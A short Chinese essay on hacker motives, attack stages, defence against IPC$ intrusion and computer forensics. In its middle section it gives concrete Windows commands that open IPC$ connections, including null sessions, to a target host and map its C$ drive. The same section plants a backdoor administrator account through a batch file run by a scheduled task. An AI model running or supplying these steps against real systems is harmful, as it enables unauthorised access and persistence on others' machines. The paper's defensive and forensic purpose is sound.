淺談黑客的入侵與防范

陳景佩

摘要：黑客是“Hacker”的音譯，源于動詞Hack，在美國麻省理工學院校園俚語中是“惡作劇”的意思，尤其是那些技術高明的惡作劇，確實，早期的計算機黑客個個都是編程高手。因此，“黑客”是人們對那些編程高手、迷戀計算機代碼的程序設計人員的稱謂。真正的黑客有自己獨特的文化和精神，并不破壞其他人的系統，他們崇拜技術，對計算機系統的最大潛力進行智力上的自由探索。

關鍵詞：Hacker；網絡；防范1黑客攻擊的動機

隨著時間的變化，黑客攻擊的動機不再像以前那樣簡單了：只是對編程感興趣，或是為了發現系統漏洞。現在，黑客攻擊的動機越來越多樣化，主要有以下幾種：⑴貪心。因為貪心而偷竊或者敲詐，有了這種動機，才引發許多金融案件。⑵惡作劇。計算機程序員搞的一些惡作劇，是黑客的老傳統。⑶名聲。有些人為顯露其計算機經驗與才智，以便證明自己的能力，獲得名氣。⑷報復/宿怨。解雇、受批評或者被降級的雇員，或者其他認為自己受到不公正待遇的人，為了報復而進行攻擊。⑸無知/好奇。有些人拿到了一些攻擊工具，因為好奇而使用，以至于破壞了信息還不知道。⑹仇恨。國家和民族原因。⑺間諜。政治和軍事諜報工作。⑻商業。商業競爭，商業間諜。

2網絡攻擊的步驟

黑客技術是網絡安全技術的一部分，主要是看用這些技術做什么，用來破壞其他人的系統就是黑客技術，用于安全維護就是網絡安全技術。學習這些技術就是要對網絡安全有更深的理解，從更深的層次提高網絡安全。

進行網絡攻擊并不是件簡單的事情，它是一項復雜及步驟性很強的工作。一般的攻擊都分為3個階段，即攻擊的準備階段、攻擊的實施階段、攻擊的善后階段。

攻擊的準備階段

⑴在攻擊的準備階段重點做3件事情：確定攻擊目的、收集目標信息以及準備攻擊工具。①確定攻擊目的：首先確定攻擊希望達到的效果，這樣才能做下一步工作。②收集目標信息：在獲取了目標主機及其所在網絡的類型后，還需進一步獲取有關信息，如目標主機的IP地址、操作系統的類型和版本、系統管理人員的郵件地址等，根據這些信息進行分析，可以得到被攻擊系統中可能存在的漏洞。③準備攻擊工具：收集或編寫適當的工具，并在操作系統分析的基礎上，對工具進行評估，判斷有哪些漏洞和區域沒有覆蓋到。

⑵以一個常見的網絡入侵為例子

IPC$入侵方法

1)IPC$連接的建立與斷開

①建立IPC$連接。假設192.168.1.104主機的用戶名為abc，密碼為123456，則輸入以下命令。

net use \192.168.1.104IPC$ "123456"/user: "abc"

若要建立空連接，則輸入以下命令。

net use \192.168.1.104IPC$ ""/user: ""

②建立網絡驅動器，輸入以下命令。

net use z: \192.168.1.104C$

若要刪除網絡驅動器，輸入以下命令。

net use z: /delete

③斷開IPC$連接。輸入以下命令。

net use \192.168.1.104IPC$ /delete

2)建立后門賬號

①編寫批處理文件。在“記事本”中輸入“net user sysback 123456 /add”和“net localgroup administrators sysback /add”命令，另存為hack.bat文件。②與目標主機建立IPC$連接。③復制文件到目標主機。輸入“copy hack.bat \192.168.1.104C$”命令，把hack.bat文件復制到目標主機的C盤中。④通過計劃任務使遠程主機執行hack.bat文件，輸入“net time \192.168.1.104”命令，查看目標系統時間。⑤假設目標系統的時間為22:30，則可輸入“at \192.168.1.104 22:35 c:hack.bat”命令，計劃任務添加完畢后，使用“net use * /delete”命令，斷開IPC$連接。⑥驗證賬號是否成功建立。等一段時間后，估計遠程主機已經執行了hack.bat文件。通過sysback賬號建立IPC$連接。若連接成功，說明sysback后門賬號已經成功建立。

3網絡攻擊的防范策略,以IPC$入侵的防范為例：

IPC$在為管理員提供了方便的同時，也留下了嚴重的安全隱患，防范IPC$入侵的方法有以下3種。

①刪除默認共享。②禁止利用空連接進行用戶名枚舉攻擊。在注冊表中，把HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsa中的restrictanonymous子鍵的值改為1。修改完畢后重新啟動計算機，這樣便禁止了利用空連接進行用戶名枚舉攻擊(nbtstat–a IP)。不過要說明的是，這種方法并不能禁止建立空連接。③關閉Server服務。Server服務是IPC$和默認共享所依賴的服務，如果關閉Server服務，IPC$和默認共享便不存在，但同時服務器也喪失了其他一些服務，因此該方法只適合個人計算機使用。④屏蔽139、445端口。沒有這兩個端口的支持，是無法建立IPC$連接的，因此屏蔽139、445端口同樣可以阻止IPC$入侵。

4網絡入侵證據的收集與分析

從事網絡安全工作的人都知道，黑客在入侵之后都會想方設法抹去自己在受害系統上的活動記錄，目的是逃脫法律的制裁。而許多企業也不上報網絡犯罪，其原因在于害怕這樣做會對業務運作或企業商譽造成負面影響，他們擔心這樣做會讓業務運作因此失序，更重要的是收集犯罪證據有一定困難。因此，CIO(Chief Information Office，首席信息官)們應該在應急響應系統的建立中加入計算機犯罪證據的收集與分析環節。

計算機取證又稱為數字取證或電子取證，是指對計算機入侵、破壞、欺詐、攻擊等犯罪行為利用計算機軟硬件技術，按照符合法律規范的方式進行證據獲取、保存、分析和出示的過程。從技術上，計算機取證是一個對受侵計算機系統進行掃描和破解，以及對整個入侵事件進行重建的過程。

4.1 計算機取證包括物理證據獲取和信息發現兩個階段

物理證據獲取是指調查人員到計算機犯罪或入侵的現場，尋找并扣留相關的計算機硬件；信息發現是指從原始數據(包括文件，日志等)中尋找可以用來證明或者反駁的證據，即電子證據。除了那些剛入門的“毛小子”之外，計算機犯罪分子也會在作案前周密部署、作案后消除蛛絲馬跡。他們更改、刪除目標主機中的日志文件，清理自己的工具軟件，或利用反取證工具來破壞偵察人員的取證。

4.2 物理取證是核心任務

在任何情況下，調查者都應牢記以下5點：(1)不要改變原始記錄。(2)不要在作為證據的計算機上執行無關的操作。(3)不要給犯罪者銷毀證據的機會。(4)詳細記錄所有的取證活動。(5)妥善保存得到的物證。

[參考文獻]

[1]陳忠平.《網絡安全》.清華大學出版社,2011年.

[2]（美）格里格瑞斯,等,著.《網絡安全：現狀與展望》.科學出版社, 2010年.

[3]王淑江.《超級網管員網絡安全》.機械工業出版社,2011年.